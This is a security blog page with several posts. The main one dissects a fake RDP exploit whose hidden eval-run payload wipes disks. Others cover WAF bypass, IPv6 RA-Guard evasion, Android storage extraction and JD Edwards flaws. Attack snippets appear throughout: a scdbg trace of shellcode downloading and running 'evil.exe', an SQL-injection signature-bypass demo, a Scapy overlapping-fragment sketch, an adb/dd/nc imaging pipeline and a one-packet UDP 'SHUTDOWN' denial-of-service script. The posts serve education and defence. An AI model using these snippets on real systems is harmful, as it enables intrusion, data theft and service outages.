Breaking

Untrusted code or why exploit code should only be executed by professionals

In March 2012 Microsoft announced a critical vulnerability (Microsoft Security Bulletin MS12-020) related to RDP that affects all Windows operating systems and allows remote code execution. A lot of security professionals expected almost the same impact as with MS08-067 (the Conficker vulnerability) and that it would only be a matter of time until reliable exploits show up in the wild. Only a few days later an exploit claiming to work against all unpatched Windows versions was released, so it seems they were right ;-). But of course no one would run an exploit without investigating the code first, so let's have a look into the exploit code.

First we take a look into the Microsoft advisory to get some information about the vulnerability itself:

The vulnerability requires some “specifically crafted RDP packets” to be sent to the vulnerable system to trigger the problem. We should spot this trigger in the exploit:

OK, the trigger is there and we also see some shellcode that will open a bindshell on TCP port 8888. The next step is to figure out what the exploit does with this code:

The exploit code converts a lot of opcodes to big endian format, which looks reasonable because the exploit claims to work on all affected Windows versions. The last step is to verify how all this is sent to the vulnerable system:

We see that the target IP address and the RDP port are collected from the command line, the RDP packet is generated and the “specifically crafted RDP packets” are sent to the target. Finally the shellcode is sent and we are ready to connect to a remote shell that listens on TCP port 8888. Game over ;-).

We have verified the exploit, so it’s time now to run it against some unpatched test system and see, if we can compromise all these unpatched boxes out there …

…JUST KIDDING, never ever do that, and I'm not even talking about the legal issues this time ;-). It is a quite common mistake of inexperienced testers to work this way. The exploit code was gathered from an untrusted source, so it needs detailed investigation before you run it, not just a short walk-through. You have to make sure you understand every line of code completely to avoid attacking yourself, and that includes the shellcode and the trigger of this RDP example. So let's dig a little bit deeper into it.

First we have to extract the shellcode and the trigger (the opcodes) from the exploit for further analysis. I prefer a special editor for this task that has all the needed functionality (and much more 😉 ) built in. It's a commercial tool called “010 Editor” that can be obtained here and is available for Windows and Mac OS X.

Step 1
Copy just the trigger opcodes into a dedicated text file; don't forget to remove the double quotes. The text files should look roughly like this:

trigger:

and shellcode:

Step 2
Use the editor's replace function to replace “\x” with “0x” in the trigger and shellcode text files. Taking the shellcode as an example, the opcodes should now look like this:

Step 3
Mark all this hex data and copy it to the clipboard.

Step 4
Choose “File-New-New Hex File” from the 010 Editor menu to create an empty hex file.

Step 5
Now choose “Edit-Paste From-Paste from Hex Text” to paste the data as hex data into the new hex file.

Step 6
Save both files (trigger and shellcode) as trigger.sc and shellcode.sc.
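
By the way, if you prefer scripting over clicking through an editor, the same conversion can be done with a few lines of Python. This is just a minimal sketch (run it once per file; the file names simply match what was chosen in step 1):

import re

with open("shellcode.txt") as f:               # the text file containing the "\x.." opcode string
    data = f.read()
opcodes = re.findall(r"\\x([0-9a-fA-F]{2})", data)
with open("shellcode.sc", "wb") as out:        # raw binary output, ready for further analysis
    out.write(bytes(bytearray(int(b, 16) for b in opcodes)))
print("wrote %d bytes" % len(opcodes))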

Now we would be ready to analyze the opcodes with some toolset, but I assume that all of you have already spotted some very interesting stuff within the shellcode part ;-):

Yes, it looks like the shellcode doesn't open a bindshell at all; it just erases parts of your hard drive on Windows and your complete root partition on Unix.

This would have been the real GAME OVER if you had run the exploit on a production system without a detailed analysis. The shellcode is referenced by the following code:

def __init__(self, payload, shellcode):
    super(RDPsocket, self).__init__(socket.AF_INET, socket.SOCK_STREAM)
    self.payload = payload
    self.table = __import__("__builtin__").__dict__   # dictionary of all Python builtins
    self.shellcode = shellcode

and then executed using this code:

seeker = (struct.pack(">I", 0x6576616c)    # 0x65,0x76,0x61,0x6c are the ASCII codes of "eval"
...
read = self.table[seeker[0]]               # "read" is now the builtin eval() function
return str(read(shellcode)), parsed        # the "shellcode" string is executed as Python code
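
Pieced together in isolation, the trick boils down to this (Python 2, as the exploit imports __builtin__; the string "6 * 7" is just a harmless stand-in for the real "shellcode"):

import struct

seeker = (struct.pack(">I", 0x6576616c),)    # yields the string "eval"
table = __import__("__builtin__").__dict__   # dictionary of all Python builtins
read = table[seeker[0]]                      # the builtin eval() function
print(read("6 * 7"))                         # prints 42 -- the string is executed as Python code

So whatever the author put into the "shellcode" string gets executed as Python code on the machine of whoever runs the "exploit".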

But in case the shellcode hadn't been so easily readable, there are more options for an easy analysis. Based on the shellcode emulation library libemu there are some tools available to find out what a shellcode is doing without reverse engineering it. SCDBG is one that runs on all Unix-based systems and also on Windows; you can grab it here.

Let us see how SCDBG works with a short example shellcode:
scdbg -f UrlDownloadToFile.sc
Loaded 150 bytes from file UrlDownloadToFile.sc
Initilization Complete..
Max Steps: 2000000
Using base offset: 0x401000
40104b  LoadLibraryA(urlmon)
40107a  GetTempPath(len=104, buf=12fce4)
4010b2  URLDownloadToFile(http://blahblah.com/evil.exe0, C:\%TEMP%\dEbW.exe)
4010bd  WinExec(c:\%TEMP%\dEbW.exe)
4010cb  ExitProcess(626801251)

Stepcount 293883

So the example shellcode downloads a malicious file and executes it. Let's have a look at our shellcode now:
scdbg -f shellcode.sc
Loaded 10d bytes from file shellcode.sc
Initilization Complete..
Max Steps: 2000000
Using base offset: 0x401000
401002  opcode 69 not supported

Stepcount 2

SCDBG fails to analyze the shellcode (for obvious reasons, as we already know), so you can take this result as a good hint that something is hidden in the code and that you'd better not run it.

Lessons learned

So finally, let’s summarize some lessons that every serious penetration tester should be aware of:

1. Never run any untrusted code (especially exploits) without a detailed analysis.
2. Ensure that you understand every line of code and this also includes the shellcode.
3. Before using untrusted code in a real pentest, verify it in a test environment (virtual machines are a good choice for that).
4. When using exploits on customer systems, be aware that you're running them on one of your customer's assets! Don't do that without your customer's permission!
5. Your customer trusts your professional knowledge, so it's your responsibility to avoid damaging any of your customer's systems by mistake.

So happy practicing and enjoy your week 😉

Michael

Continue reading
Misc

The 5 Myths of Web Application Firewalls

Some days ago a security advisory related to web application firewalls (WAFs) was published on Full Disclosure. Wendel Guglielmetti Henrique found another bug in the IBM Web Application Firewall which can be used to circumvent the WAF and execute typical web application attacks like SQL injection (click here for details). Wendel already talked (look here) at the Troopers conference in 2009 about the different techniques to identify and bypass WAFs, so these kinds of bypass methods are not exactly new.

Nevertheless, doing a lot of web application assessments and talking about countermeasures to protect web applications, there's a TOP 1 question I have to answer almost every time: “Wouldn't it be helpful to install a WAF in front of our web application to protect it from attacks?”. My typical answer is “NO”, because it's better to spend the resources on addressing the problems in the code itself. So I will take this opportunity to write some rants about the sense and nonsense of WAFs ;-). Let's start with some – from our humble position – widespread myths:

1. WAFs will protect a web application from all web attacks.
2. WAFs are transparent and can't be detected.
3. After installation of a WAF our web application is secure, no further “To Dos”.
4. WAFs are smart, so they can be used with any web application, no matter how complex it is.
5. Vulnerabilities in web applications can't be fixed in time, only a WAF can help to reduce the attack surface.

And now let us dig a little bit deeper into these myths ;-).

1. WAFs will protect a web application from all web attacks

There are different attack detection models used by common WAFs like signature based detection, behavior based detection or a whitelist approach. These detection models are also known by attackers, so it’s not too hard to construct an attack that will pass the detection engines.

Just a simple example for signatures ;-): studying SQL injection attacks, we learn from all the examples that we can manipulate WHERE clauses with attacks like “or 1=1”. This is a typical signature for the detection engine of a WAF, but what about using “or 9=9” or, even smarter 😉, “or 14<15”? This might sound ridiculous to most of you, but it already worked against at least one WAF 😉 and there are much more leet attacks to circumvent WAFs (sorry that we don't disclose any vendor names, but this post is about WAFs in general).
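
To illustrate the point with a deliberately simplified, purely hypothetical signature (not taken from any real product), consider how easily a naive pattern is sidestepped:

import re

signature = re.compile(r"or\s+1\s*=\s*1", re.IGNORECASE)   # naive "SQL injection" signature

for payload in ("' or 1=1 --", "' or 9=9 --", "' or 14<15 --"):
    verdict = "blocked" if signature.search(payload) else "passes"
    print(payload + "  ->  " + verdict)

Only the first payload matches; the two semantically equivalent variants sail through.
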
Another point to mention are the different types of attacks against web applications: it's not all about SQL injection and Cross-Site Scripting, there are also logic flaws that can be attacked, or the typical privilege escalation problem “can user A access data of user B?”. A WAF can't protect against these attacks. It can raise the bar for attackers under some circumstances, but it can't protect a web application from skilled attackers.

2. WAFs are transparent and can’t be detected

In 2009, initially at Troopers ;-), Wendel and Sandro Gauci published a tool called wafw00f and described their approach to fingerprint WAFs in different talks at security conferences. This already proves that this myth is not true. Furthermore there will be another tool release from ERNW soon, so stay tuned, it will be available for download shortly ;-).

3. After installation of a WAF my web application is secure, no further “To Dos”

WAFs require a lot of operational effort, just because web applications offer more and more functionality and the main purpose of a web application is to support the organization's business. WAF administrators have to ensure that the WAF doesn't block any legitimate traffic. It's almost the same as with Intrusion Detection and Prevention Systems: they require a lot of fine tuning to detect important attacks while ensuring functionality in parallel. History proves that this didn't (and still doesn't) work for most IDS/IPS implementations, so why should it work for WAFs ;-)?

4. WAFs are smart, so they can be used with any web application, no matter how complex it is
Today’s web applications are often quite complex, they use DOM based communication, web services with encryption and very often they create a lot of dynamic content. A WAF can’t use a whitelist approach or the behavior based detection model with these complex web applications because the content changes dynamically. This reduces the options to the signature based detection model which is not as effective as many people believe (see myth No. 1).

5. Vulnerabilities in web applications can’t be fixed in time, only a WAF can help to reduce the attack surface
This is one of the most common sales arguments, because it contains a lot of reasonable points, but what these sales guys don't tell you is that a WAF won't really solve your problem either ;-).
Talking about risk analysis the ERNW way, we have 3 contributing factors: probability, vulnerability and impact. A WAF won't have any influence on the impact, because if the vulnerability gets exploited there's still the same impact. Looking at probability from the risk analysis view, you have to take care not to consider existing controls (like WAFs 😉 ), because we're talking about the probability that someone tries to attack your web application, and I think it's pretty clear that the installation of a WAF won't change that ;-). So there's only the vulnerability factor left that you can change with the implementation of controls.
But let me ask one question using the picture of the Fukushima incident: what is the better solution to protect a nuclear plant from tsunamis? 1. Building a high wall around it to protect it from the water? 2. Building the plant at a place where tsunamis can't occur?

I think the answer is obvious, and it's the same with web application vulnerabilities: if you fix them, there's no need for a WAF. If you start using a Security Development Lifecycle (SDL) you can reach this goal with reasonable effort ;-), so it's not a matter of costs.

With these myths of web application firewalls clarified, I think the conclusions are clear: spend your resources on fixing the vulnerabilities in your web applications instead of buying yet another appliance that needs operational effort, only slightly reduces the vulnerability instead of eliminating it and also costs more money. We have quite a lot of experience supporting our customers with an SDL, and from this experience we can say that it works effectively and can be implemented more easily than many people think.

You are still not convinced ;-)? Shortly we will publish an ERNW newsletter (our newsletter archive can be found here) describing techniques to detect and circumvent WAFs, together with a new tool called TSAKWAF (The Swiss Army Knife for Web Application Firewalls) which implements these techniques for practical use. Maybe this will change your mind ;-).

Have a nice day,

Michael

Continue reading
Building

The Story Continues – Another IPv6 Update

TROOPERS12 came to an end last week on Friday; needless to say it was an awesome event. 😉
The first two days offered workshops on various topics. On Monday Enno, Marc “Van Hauser” Heuse and I gave a one day workshop on “Advanced IPv6 Security”. I think attendees as well as trainers had a really good time during and after the workshop fiddling around with IPv6. Especially Marc had quite some fun when he discovered that we provided “global” IPv6 connectivity for the conference network; according to one of his tweets, TROOPERS12 was the first security conference he visited that offered this kind of connectivity.

So back to the topic

Our last posts on IPv6 Security go back to the first half of 2011. If you haven’t read them already, now it’s a good time to do so. You can find them here, here, here and here.

In the last post of the series Enno discussed how RA-Guard can be circumvented with clever use of extension headers. As a short reminder, the packet dump looks like this.


The information about the upper-layer protocol is only present in the second fragment, so RA-Guard does not kick in.

As we found out at the Heise IPv6 Kongress last year, this issue can be mitigated with the following parameter in an IPv6 ACL:

deny ipv6 any any undetermined-transport

As a reminder, this parameter drops all IPv6 packets where the upper-layer protocol information cannot be determined.

After the workshop was officially over, Marc and I played a little bit with this ACL Parameter to see if it is working as intended. So I configured the following IPv6 ACL on our beautiful Cisco 4948E:

4948E(config)#ipv6 access-list IPv6
4948E(config-ipv6-acl)#deny ipv6 any any undetermined-transport
4948E(config-ipv6-acl)#permit ipv6 any any
4948E(config)#interface g1/19
4948E(config-if)#ipv6 traffic-filter IPv6 in

We started the attack again with the following parameter:

Apparently nothing happened with my (IPv6 enabled) laptop (which is a good thing ;))

The corresponding packet dump looked quite unspectacular:

Only the STP packets could be seen, and the flooded router advertisements were dropped by the Switch.

So could this parameter solve the issue with the whole RA mess?

Unfortunately the answer is no. The ACL parameter does mitigate the issue with the fragmented router advertisement. However, it can be circumvented by using overlapping fragments. Unfortunately we couldn't test this scenario because it wasn't yet implemented in the THC tool suite, but this is just a matter of time…

The IPv6 packet basically looks like this:

Fragment 1:
IPv6 Header
Fragmentation Header
Destination Options Header (8 bytes)
ICMPv6 Echo Request

Fragment 2:
IPv6 Header
Fragmentation Header with offset == 1 (equals the position of the 8th byte == start of the Echo Request in the first fragment)
ICMPv6 RA
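
Just to give an idea, such a fragment pair could be generated with Scapy roughly as follows (an untested sketch; destination address and fragment ID are placeholders):

from scapy.all import (IPv6, IPv6ExtHdrFragment, IPv6ExtHdrDestOpt,
                       ICMPv6EchoRequest, ICMPv6ND_RA, send)

target = "ff02::1"     # placeholder destination
fid = 0x1337           # arbitrary fragment ID, must be identical in both fragments

# Fragment 1: Fragment Header + 8 byte Destination Options Header + Echo Request
frag1 = IPv6(dst=target) / IPv6ExtHdrFragment(id=fid, offset=0, m=1) / \
        IPv6ExtHdrDestOpt() / ICMPv6EchoRequest()

# Fragment 2: offset 1 (= byte 8) overlaps the Echo Request and replaces it with an RA
frag2 = IPv6(dst=target) / IPv6ExtHdrFragment(id=fid, offset=1, m=0) / ICMPv6ND_RA()

send(frag1)
send(frag2)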

 

In this case it depends on the operating system whether or not the packet is discarded when overlapping fragments are detected. RFC 5722 is very specific on how these should be handled:

“When reassembling an IPv6 datagram, if one or more its constituent fragments is determined to be an overlapping fragment, the entire datagram (and any constituent fragments, including those not yet received) MUST be silently discarded.”

So it is up to the operating system to implement this behavior. We’ll see how things work out 😉

If you’re interested in more IPv6 issues, or simply wanna chat about this topic, meet Enno and me again at the  Heise IPv6 Kongress this year in Frankfurt, where we will give a talk on IPv6 as well.

Have a great day,
Chris

 

Continue reading
Breaking

A Comment on Android PIN bypass

Lately there have been some rumors on the full-disclosure mailing list referring to a blog post by Hatforce about a new method to bypass the PIN/password lock on Android Gingerbread phones.
The approach was to boot into recovery mode and execute a reset to factory state. The ideal result should be a reliable wipe of the /data partition. However, the author managed to recover data after the wiping process. This has been presented as a method of extracting sensitive data without knowing the actual PIN or passcode.

This approach was tested on a Nexus S smartphone with Android 2.3.6, assuming the problem could be present on other devices too.
In our experience this actually affects all Android devices without device encryption. Meanwhile we have had more than ten different Android 2.3.x devices from four different vendors in our hands, and all of them need less than a minute for a factory reset. A current example is the HTC Desire HD with a 1.1 GB /data partition (excluding the /cache partition): the factory reset procedure took about 40 seconds, which alone should make you question whether this time is actually sufficient to wipe the whole storage. And indeed, we have been able to recover data from factory-reset devices as part of previous studies.

Besides that, the blog post mentions that the source code indicates that devices running Android Honeycomb and later effectively wipe the data. After looking into the source code of Android Ice Cream Sandwich, we found that the FileWriter class is used for the wipe of the /cache and /data partitions, so there is no indication of the data actually being overwritten here. We assume that, by mentioning the issue as resolved, the author was referring to Android Honeycomb device encryption being used, which indeed resolves this issue. Device encryption has been announced as a new feature anyway.

The point about getting the data without knowing the PIN, however, does not really fit the case. In our opinion that's not a new thought anyway: as long as the storage is not encrypted there are always ways to access and read it. My favorite way is to flash the recovery partition with a custom one, e.g. ClockworkMod. By this means it's possible to run the Android Debugging Bridge, su and dd binaries, which in turn can be used to connect to the device via USB cable and create a raw copy of the storage. Additionally it becomes possible to follow the loudness principle and acquire data on a forensic level.
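
Just as a rough outline (block device paths differ per device, and a netcat binary on the phone, e.g. from BusyBox, is assumed), pulling such a raw image over USB could look like this:

adb forward tcp:5555 tcp:5555                # forward a TCP port through the USB connection
adb shell                                    # get a shell on the device
su
dd if=/dev/block/mmcblk0 | nc -l -p 5555     # serve a raw image of the internal storage
# ...and on the host, in a second terminal:
nc 127.0.0.1 5555 > mmcblk0.raw

The resulting image can then be examined with the usual forensic tooling.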

However there is one important aspect mentioned in the blogpost, which we fully agree with: lost device means lost data!

Have a great day

Sergej

 

Continue reading
Events

Troopers TelcoSecDay

As there has been some public demand for that, here we go with the final agenda for the Troopers “TelcoSecDay“. The workshop is meant to provide a platform for research exchange between operators, vendors and researchers. The slides of the talks will potentially be made available as well.

  • 8:30: Opening Remarks & Introduction
  • 9:00: Sebastian Schrittwieser (SBA Research): Guess Who’s Texting You? Evaluating the Security of Smartphone Messaging Applications.
  • 10:00: Peter Schneider (NSN): How to secure an LTE-Network: Just applying the 3GPP security standards and that’s it?
  • 10:45: Break
  • 11:00: Kevin Redon (T-Labs): Weaponizing Femtocells – The Effect of Rogue Devices on Mobile Telecommunications
  • 11:45: Christian Kagerhuber (Group IT Security, Deutsche Telekom AG): Security Compliance Audit Automation (SCA, TeleManagementForum TMF528)
  • 12:30: Lunch
  • 13:45: Philippe Langlois (P1 Security): Assault on the GRX (GPRS Roaming eXchange) from the Telecom Core Network perspective, from 2.5G to LTE Advanced.
  • 15:00: Break
  • 15:15: Harald Welte (sysmocom): Structural deficits in telecom security
  • 16:30: Closing Remarks
  • 17:00: End of workshop
  • 19:00: Joint dinner (hosted by ERNW) in Heidelberg Altstadt for those interested and/or staying for the main conference

====

Synopses & Bios

Sebastian Schrittwieser: Guess Who’s Texting You? Evaluating the Security of Smartphone Messaging Applications.

Synopsis: Recently, a new generation of Internet-based messaging applications for smartphones was introduced. While user numbers are estimated in the millions, little attention has so far been paid to the security of these applications. In this talk, we present our experimental results, which revealed major security flaws, allowing attackers to hijack accounts, spoof sender-IDs, and enumerate subscribers.

Bio: Sebastian Schrittwieser is a PhD candidate at the Vienna University of Technology and a researcher at SBA Research. His research interests include, among others, digital forensics, software protection, code obfuscation, and digital fingerprinting. Sebastian received a Dipl.-Ing. (equivalent to MSc) degree in Business Informatics with focus on IT security from the Vienna University of Technology in 2010.

===

Peter Schneider: How to secure an LTE-Network: Just applying the 3GPP security standards and that’s it?

Synopsis: This talk briefly introduces the security architecture of an LTE mobile network as specified by 3GPP and shows which threats it mitigates and which not. It discusses additional, not-standardized security measures and how they can contribute to making mobile networks as secure as they need to be.

Bio: After many years of research, prototyping and systems engineering in the area of communication technologies, Peter works currently as a senior expert for mobile network security in the Security Technologies Team at Nokia Siemens Networks Research. He is author of various mobile network related security concepts. He is also active in the 3GPP security standardization and in several security research projects.

===

Kevin Redon: Weaponizing Femtocells – The Effect of Rogue Devices on Mobile Telecommunications

Synopsis: Mobile phones and carriers trust the traditional base stations which serve as the interface between the mobile devices and the fixed-line communication network. Femtocells, miniature cellular base stations installed in homes and businesses, are equally trusted yet are placed in possibly untrustworthy hands. By making several modifications to a commercially available femtocell, we evaluate the impact of attacks originating from a compromised device. We show that such a rogue device can violate all the important aspects of security for mobile subscribers, including tracking phones, intercepting communication and even modifying and impersonating traffic. The specification also enables femtocells to directly communicate with other femtocells over a VPN and the carrier we examined had no filtering on such communication, enabling a single rogue femtocell to directly communicate with (and thus potentially attack) all other femtocells within the carrier’s network.

Bio: Kevin Redon does his master of computing at the Technische Universitaet Berlin. He also works for “Security in Telecommunication” (SecT), a research group of the university.

===

Christian Kagerhuber: Security Compliance Audit Automation (SCA, TeleManagementForum TMF528)

Synopsis: Today, Service Providers are in need of comprehensive information relevant to effective security management. Service Providers have to evaluate and verify the compliance of their infrastructure and services to corporate security  directives and legal guidelines. This includes being able to retrace OSS Operators’ behavior on OSS systems via standardized log messages. But to answer all necessary security compliance questions, log data alone appears not to be sufficient.
Service Providers need configuration data and telemetry data centrally at hand without manual, time-consuming OSS Operator activity. Even interactive polling of their devices is not sufficient, because Service Providers must track down changes in the environment and the effective date/period. The talk is about how to solve this problem.

Bio: Christian is a Senior Security Expert at Deutsche Telekom (DT), responsible for the security of DT's NGOSS system (called NGSSM) and the BNG/SCRAT project. He built up T-Online's Identity Management and CERT and is the author of various Deutsche Telekom security standards, e.g. on platform virtualisation and SSH.

===

Philippe Langlois: Assault on the GRX (GPRS Roaming eXchange) from the Telecom Core Network perspective, from 2.5G to LTE Advanced.

Synopsis: GRX is the global private network where telecom network operators exchange the GPRS roaming traffic of their users. It's also used for all M2M networks where roaming is used, and that is the case for anything from a company's truck fleet management system down to an intelligence GPS location spybug tracking system. GPRS has been there from 2.5G GSM networks up to the upcoming LTE Advanced networks and is now a quite widespread technology, along with its attacks. GRX has had a structuring role in the global telecom world at a time when IP dominance was beginning to be acknowledged. Now it has evolved into a lightweight structure using both IP technologies and ITU-originated protocols.
We'll see how this infrastructure is protected and how it can be attacked, and we'll discover the issues with the specific telco equipment inside GRX, namely GGSN and SGSN but also now PDN Gateways in the LTE and LTE Advanced “Evolved Packet Core”. We will see its implications for the GTP protocol, the DNS infrastructure, AAA servers and core network technologies such as MPLS, IPsec VPNs and their associated routing protocols. These network elements were rarely evaluated for security, and during our vulnerability analysis engagements we've seen several typical vulnerabilities that will be shown in this talk. We will demo some of the attacks on a simulated “PS Domain” network, that is, the IP part of the telecom core network that transports customers' traffic, and investigate its relationships with legacy SS7, SIGTRAN IP backbones, M2M private corporate VPNs and telecom billing systems. We will also see how automation enables us to succeed at attacks which are hard to perform and will show how a “sentinel” attack was able to compromise a telecom core network during one penetration test.

Bio: Philippe Langlois is a leading security researcher and expert in the domain of telecom and network security. He founded internationally recognized security companies (Qualys, WaveSecurity, INTRINsec, P1 Security) and led technical, development and research teams (Solsoft, TSTF). He founded Qualys and led its world-leading vulnerability assessment service, and founded the pioneering network security company Intrinsec in 1995 in France. He founded his first business, Worldnet, France's first public Internet service provider, in 1993. Philippe was also lead designer for Payline, one of the first e-commerce payment gateways. He has written and translated security books, including some of the earliest references in the field of computer security, and has been giving talks on network security since 1995 (Interop, BlackHat, HITB, Hack.lu). He was previously a professor at the Ecole de Guerre Economique and at various universities in France (Amiens, Marne La Vallée) and internationally (FUSR-U, EERCI). He is a collaborator and founding member of FUSR-U (Free University for Security Research). Philippe provides industry associations (GSM Association Security Group, several national organizations) and governmental officials with critical infrastructure advisory conferences in telecom and network security. With P1 Security, Philippe now provides the first core network telecom signaling security scanner & auditor, which helps telecom companies, operators and governments analyze where and how their critical telecom network infrastructure can be attacked. He can be reached through his website at: http://www.p1security.com
He has presented previously at these security/hacking conferences: Hack.lu, Hack in the Box (HITB), BlackHat, Hackito Ergo Sum (Paris, France), SOURCE, Chaos Communication Congress (Berlin, Germany), ekoparty (Buenos Aires, Argentina), H2HC (Sao Paulo, Brazil), SYSCAN (Hong Kong; Thailand), Bellua (Jakarta, Indonesia), INT (Mauritius), Interop… (some events are listed at http://www.p1sec.com/corp/about/events/ )

===

Harald Welte: Structural deficits in telecom security

Synopsis: Especially in recent years, numerous practical attacks and tools have been developed and released.  The attack patterns and methods from the dynamic Internet world have finally caught up with the dinosaur of the Telecom world.  So far, the industry has failed to demonstrate sufficient interest in developing proper responses.  The changes so far have been superficial.  Are they a sufficient response for what is to come?  Has the telecom industry realized the true implications of having left the “walled garden”?  The talk will leave the field of actual attacks behind in order to talk about what at least the author perceives as structural deficits in terms of IT security at operators and equipment vendors.

Bio: Harald Welte has been a communications security consultant for more than a decade. He was a co-author of the netfilter/iptables packet filter in the Linux kernel and has since been involved in a variety of Free Software based implementations of protocol stacks for RFID, GSM, GPRS, and TETRA. His main interest is to look at the security of communication systems beyond the IP-centric mainstream. Besides his consulting work, he is the general manager of Sysmocom GmbH, providing custom tailored communications solutions to customers world-wide.

===

Have a great Sunday everybody, see you soon at Troopers 😉

Enno

Continue reading
Breaking

ERP Platforms Are Vulnerable

This is a guest post by the SAP security expert Juan Pablo Perez-Etchegoyen, CTO of  Onapsis. Enjoy reading:

At Onapsis we are continuously researching in the ERP security field to identify the risks that ERP systems and business-critical applications are exposed to. This way we help customers and vendors to increase their security posture and mitigate threats that may be affecting their most important platform: the one that stores and manages their business’ crown jewels.

We have been talking about SAP security at many conferences over the last years, not only showing how to detect insecure settings and vulnerabilities but also explaining how to mitigate and solve them. However, something that is still less known is that since 2009 we have also been doing research on Oracle's ERP systems (JD Edwards, Siebel, PeopleSoft, E-Business Suite) and reporting vulnerabilities to the vendor. In this post, I'm going to discuss some of the vulnerabilities that we reported and Oracle fixed with the patches released in the latest CPU (Critical Patch Update) of January 2012. In this CPU, 8 vulnerabilities reported by Onapsis affecting JD Edwards were fixed.

What's really important about these vulnerabilities is that most of them are highly critical, enabling a remote unauthenticated attacker to fully compromise the ERP server just by having network access to it. I'm going to analyze some of these vulnerabilities to shed some light on the real status of JD Edwards' security. Most of them are exploitable through the JDENET service, a proprietary protocol used by JDE for connecting the different servers.

Let’s take a look at the most interesting issues:

ONAPSIS-2012-001: Oracle JD Edwards JDENET Arbitrary File Write

By sending a specific JDENET message, an attacker can basically instruct the server to write arbitrary content to an arbitrary location, leading to an arbitrary file write condition.

ONAPSIS-2012-002: Oracle JD Edwards Security Kernel Remote Password Disclosure

By sending a packet containing a key hard-coded in the kernel, an attacker can “ask for” a user's password (!).

ONAPSIS-2012-003: Oracle JD Edwards SawKernel Arbitrary File Read

An attacker can read any file by connecting to the JDENET service.

ONAPSIS-2012-007: Oracle JD Edwards SawKernel SET_INI Configuration Modification

Modifications to the server configuration (JDE.INI) can be performed remotely and without authentication. Several attacks are possible abusing this vulnerability.

ONAPSIS-2012-006: Oracle JD Edwards JDENET Large Packets Denial of Service

If an attacker sends packets larger than a specific size, the server's CPU starts processing at 100% of its capacity. Game over.

As a “bonus” to this guest blog post, I would like to analyze a vulnerability related to the set of security advisories we released back in April 2011 (many of them also critical). This vulnerability is ONAPSIS-2011-07.

The exploitation of this weakness is very straightforward, as the only thing an attacker needs to do is send a packet to the JDENET command service (typically UDP port 6015) with the message “SHUTDOWN”, and all JD Edwards services are powered off! Business impact? None of the hundreds or thousands of the company's employees who need the ERP system for their everyday work will be able to do their job.
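
Conceptually the whole “attack” is nothing more than a single datagram. As a minimal sketch (the target address is a placeholder, and any JDENET-specific framing is left out here):

import socket

TARGET = ("192.0.2.10", 6015)                         # placeholder host, JDENET command port
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(b"SHUTDOWN", TARGET)                         # one unauthenticated datagram...
s.close()                                             # ...and the ERP services go down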

Some people still talk about ERP security as a synonym of Segregation of Duties controls. This is just an example of a high-impact Denial of Service attack that can be performed against the technical components of these systems. No user or password. No roles or authorizations.

Even worse, as UDP connections are stateless, it's trivial for an attacker to forge the source address and exploit the vulnerability, potentially bypassing firewall filters.

Hope you enjoyed our post and I’d like to thank Enno, Florian and the great ERNW team for their kind invitation.

You can get more information about our work at www.onapsis.com

BTW: Meet Mariano Nuñez Di Croce, CEO of Onapsis at TROOPERS12 in about ten days! He will give a talk and also host a dedicated workshop on SAP security.

Continue reading
Building

Applying the ERNW Seven Sisters Approach to VoIP Networks

Hi,

if you’re following this blog regularly or if you’ve ever attended an ERNW-led workshop which included an “architecture section” you will certainly remember the “Seven Sisters of Infrastructure Security” stuff (used for example in this post). These are a number of (well, more precisely, it’s seven ;-)) fundamental security principles which can be applied to any complex infrastructure, be that a network, a building, an airport or the like.

As part of our upcoming Black Hat and Troopers talks we will apply those principles to some VoIP networks we (security-) assessed and, given we won’t cover them in detail there, it might be helpful to perform a quick refresher of them, together with an initial application to VoIP deployments. Here we go; these are the “Seven Sisters of Infrastructure Security”:

  • Access Control
  • Isolation
  • Restriction
  • Encryption
  • Entity Protection
  • Secure Management
  • Visibility

Now, let me discuss them in a bit more detail and put them into a VoIP context.

 

Access Control (“try to keep the threats out of the environment containing the assets to be protected”)

This should pretty much always be an early consideration as limiting access to “some complex infrastructure” obviously provides a first layer of defense and does so in a preventative[1] way. Usually authentication plays a major role here. Please note that in computer networks the access control principle does not only encompass “access to the network [link]” (where unfortunately the most prevalent technology – Ethernet – does not include easy-to-use access control mechanisms. And, yes, I’m aware of 802.1X…) but can be applied to any kind of (“sub-level”) communication environment or exchange. Taking a “passive-interface” approach for routing protocols is a nice example here as this usually serves to prevent untrusted entities (“the access layer”) from participating in some critical protocol [exchange][2] at all.
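
To give the passive-interface idea a concrete (and purely illustrative) IOS flavor, with process ID and interface name as placeholders, it could look like this:

router ospf 1
 ! do not send or accept routing protocol packets on any interface by default
 passive-interface default
 ! ...except on the uplink towards the rest of the routed network
 no passive-interface GigabitEthernet0/1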

In a VoIP scenario limiting who can participate in the various layers and communication exchanges, be it by authentication, be it by configuration of static communication peers for certain exchanges[3] (yes, we know this might not scale and usually has a bad operational feasibility) would be an implementation of the access control principle.

 

Isolation (“separate some elements of the environment from others, based on attributes like protection need, threat potential or trust/worthiness”)

In computer networks this one is usually implemented by network segmentation (with different technologies like VLANs or VRFs and many others) and it's still one of the most important infrastructure security principles. I mean, can you imagine an airport or corporate headquarters without areas of differing protection needs, different threat exposure or separate layers and means of access? [You can't? So why do you think about virtualizing all your corporate computer systems on one big unified “corporate cloud”? ;-)]

Again, it should be noted that “traditional network segmentation” is only one variant. Using RFC 1918 (or ULA, for that matter) addresses in some parts of your network without NATing them at some point, or refraining from route distribution at some demarcation point constitute other examples.

In the VoIP world the main realization of the isolation principle is the commonly found approach of “voice vs. data VLAN[s]”.

 

Restriction (“once [as of the above principle] isolated parts get connected try to limit the interaction between those parts at the intersection point”)

This is the one most people think of when it comes to network security as this is what the most widely deployed network security control, that is firewalls, is supposed to do.

Two points should be noted here, from our perspective:

In some network security architecture documents, phrases like “the different segments are [to be] separated by firewalls” can be found. Which, well, is a misconception: usually a firewall connects networks (which would be isolated otherwise), it does not separate them. It may (try to) limit the traffic passing the intersection point, but it still is a connection element.

And it should be noted that the restriction it applies (by filtering traffic) always has an operational price tag. Which is one of the reasons why firewalls nowadays tend to fail so miserably when it comes to their actual security benefit…

In VoIP networks using the restriction approach is considerably hard (and hence quite often simply doesn't happen) given a number of protocols' volatility when it comes to the (UDP/TCP) ports they use.

Encryption (“while in transit encrypt some asset to protect it from threats on its [transit] way”)

This is a very common infrastructure security control as well (alas, at times the only one people think of) and probably does not need further explanation here.

Still it should be noted – again – that it has an operational price tag (key management and the like). Which – again – is the very reason why it sometimes fails so miserably when it comes to providing actual security…

